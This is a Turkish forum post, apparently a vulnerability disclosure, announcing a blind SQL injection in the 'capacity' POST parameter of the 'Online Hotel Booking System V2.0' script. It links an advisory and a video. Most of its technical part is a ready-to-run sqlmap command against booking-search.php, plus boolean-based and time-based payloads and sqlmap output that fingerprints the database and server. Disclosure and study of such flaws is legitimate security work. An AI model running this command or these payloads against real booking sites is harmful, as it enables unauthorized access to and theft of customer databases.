- 8 Eyl 2016
- 1,646
- 996
Bug Search kapsamındaki çalışmamdır. "Online Hotel Booking System V2.0 " scripti üzerinde Blind SQL İnjection zafiyeti tarafımca tespit edilmiştir. Videou olarak anlatımınıda yaptım.
Link:
https://cxsecurity.com/issue/WLB-2017050054
VİDEO:
[ame]https://www.youtube.com/watch?v=eW3ep3P-AXo&feature=youtu.be[/ame]
Kod:
<------------------ header data start ------------------- >
#############################################################
# Application Name : Online Hotel Booking System V2.0
# Vulnerable Type : Boolean-Based Blind SQL njection & Time-Based Blind SQL İnjection
# Software Link: https://www.bestsoftinc.com/
# Tested On Demo Site:
http://envato.bestsoftinc.net/hotel-booking/
# Author: Siber Gvenlik Akademisi - Pentester
# Date: 08.05.2017
# Tested on: Windows 8.1 / Mozilla Firefox
# Vulnerable Parameter: 'capacity' (POST)
# SQLİ: http://localhost/hotel-booking/booking-search.php
# Proof of concept:
sqlmap -u "http://localhost/hotel-booking/booking-search.php/" --data="check_in=05%2F09%2F2017&check_out=05%2F16%2F2017&capacity=1" -p "capacity" --random-agent --threads=5 --dbs
Parameter: capacity (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: check_in=05/09/2017&check_out=05/24/2017&capacity=1 AND 3025=3025
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: check_in=05/09/2017&check_out=05/24/2017&capacity=1 AND SLEEP(5)
---
[15:39:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL 5.0.12
< ------------------- header data end of ------------------- >https://cxsecurity.com/issue/WLB-2017050054
VİDEO:
[ame]https://www.youtube.com/watch?v=eW3ep3P-AXo&feature=youtu.be[/ame]
